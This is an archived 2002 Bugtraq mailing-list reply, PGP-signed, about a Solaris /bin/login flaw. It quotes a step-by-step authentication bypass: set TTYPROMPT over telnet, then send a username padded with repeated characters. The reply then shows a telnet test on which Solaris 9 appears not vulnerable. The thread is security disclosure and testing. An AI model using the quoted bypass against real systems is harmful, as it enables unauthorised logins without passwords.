[27273] in bugtraq
Re: Solaris 2.6, 7, 8
daemon@ATHENA.MIT.EDU (Ido Dubrawsky)
Thu Oct 3 16:03:04 2002
Date: Wed, 2 Oct 2002 14:16:28 -0500
From: Ido Dubrawsky <idubraws@cisco.com>
To: Jonathan S <js@APOLLO.GTI.NET>
Message-ID: <20021002191628.GB12174@cisco.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="wq9mPyueHGvFACwf"
Content-Disposition: inline
In-Reply-To: <Pine.BSO.4.44.0210021207060.25321-100000@eurocompton.net>
--wq9mPyueHGvFACwf
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
> Hello,
>=20
> Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT. This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
> However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists. The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n". You will then be logged in as the user
> without any password authentication. This should work with any account
> except root (unless remote root login is allowed).
>=20
Looks like Solaris 9 is not vulnerable to this:
[idubraws@elrond idubraws]
6 $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o 192.168.155.2
Trying 192.168.155.2...
Connected to 192.168.155.2.
Escape character is '^]'.
SunOS 5.9
login:
It automatically drops you to the login prompt. Perhaps this is fixed by a=
=20
patch that got rolled into 9?
Ido
--=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D
|Ido Dubrawsky E-mail: idubraws@cisco.com
| | |Network Consulting Engineer
:|: :|: |VSEC Technical Marketing, SAFE Architecture
:|||: :|||: |Cisco Systems, Inc.
=2E:|||||||:..:|||||||:. |Austin, TX. 78759
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D
--wq9mPyueHGvFACwf
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (SunOS)
iD8DBQE9m0YKHhk5SQHyFEwRAgMOAKC/BmfJKEg5LmeUHVzVKSQnD2l+cwCglOkZ
Fm+VzOrNfJoImHZdm+E7m60=
=0dTH
-----END PGP SIGNATURE-----
--wq9mPyueHGvFACwf--
